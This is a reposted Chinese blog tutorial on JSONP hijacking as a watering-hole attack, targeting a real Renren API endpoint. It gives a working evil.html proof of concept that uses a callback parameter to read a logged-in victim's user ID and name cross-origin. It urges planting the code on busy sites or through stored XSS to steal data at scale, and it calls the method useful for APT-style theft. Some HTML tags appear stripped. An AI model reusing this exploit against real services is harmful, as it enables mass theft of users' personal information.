zoukankan      html  css  js  c++  java
  • 水坑攻击之Jsonp hijacking-信息劫持,在钓鱼页面上调用js代码来获取用户在某些敏感站点的个人信息(如人人等)

    水坑攻击之Jsonp hijacking-信息劫持

            0X01 Jsonp hijacking作用

    这是一种基于水坑攻击的攻击方式,用于大规模的获取用户信息,因为可以绕过同源策略的限制而展开,所以其威力巨大,尤其是在一些大型网站的接口处,用此方法可以盗取已登陆用户的敏感信息从而进行进一步的攻击。

    0x02 劫持原理

    在说原理之前,首先需要了解js中callback函数的作用,callback是js中的回调函数,这个函数的用处在于它自己是个函数,但是他会将自己作为参数传给另一个函数,并且在父函数执行完成之后再执行。

    借用这个原理,我们来试试跨域加载数据:

    这是人人网的一个接口,用于显示用户信息

    在没登陆的时候,可以看到图中的信息,提示未登陆用户。然后我们本地构造劫持代码,建立evil.html文件。

      <body>

    <>

    function run(obj){

    document.write(obj.status);

    }

    </>

    < src="http://base.yx.renren.com/RestAPI?method=api.base.getLoginUser&format=2&callback=run"></>

    </body

    注意到我在url中添加了参数callback=run,这样就会导致url在被加载完成之后会继续加载我们的run函数,本地访问网页:

    输出了-110,可以看到,我们成功跨域加载了数据到本地域中,但是这有什么作用呢?还是以一个例子尝试,我们登录人人网后来访问这个API

    可以看到,返回了用户的敏感信息,我们根据此json返回数据来修改我们的恶意代码文件evil.html<body>

      <>

    function run(obj){

    document.write(obj.status+"<br/>"+obj.user.userId+"<br/>"+obj.user.userName);

    }

    </>

    < src="http://base.yx.renren.com/RestAPI?method=api.base.getLoginUser&format=2&callback=run"></>

    </body>

    本地访问evil.html

    成功在本地域劫持到用户信息。这个漏洞的利用条件就是需要用户访问我们构造的恶意界面,当然如果我们将这些代码放在用户访问量比较大的网站上,其成功率就可大大提高。至于如何将本地的劫持到的数据存储下来,就没必要多说了。

    0x03结论

    这种技术想来也是用在APT攻击中的,而且是大规模的数据窃取,作为一种技术手段还是很有用的,不过首先你要有一个大型网站的存储xss或者你自己的博客比较火火火火……

    *信息源:http://www.stardustsky.net/post/25.html

    *铸剑网络安全实验室CSNS-Lab

  • 相关阅读:
    硬件的快速迭代开发
    DAC8775芯片的使用
    单片机引脚复用使用不当会导致bug
    单片机为32bit时运算中64bit运算中遇到的bug及其规避手段
    UDS文档的阅读
    DAC124S085芯片的使用
    LSD低边驱动芯片的特点
    小时候的玩具激光灯拆解
    飞思卡尔系列单片机的censorship的使用
    TypeScript学习小结
  • 原文地址:https://www.cnblogs.com/bonelee/p/15200235.html
Copyright © 2011-2022 走看看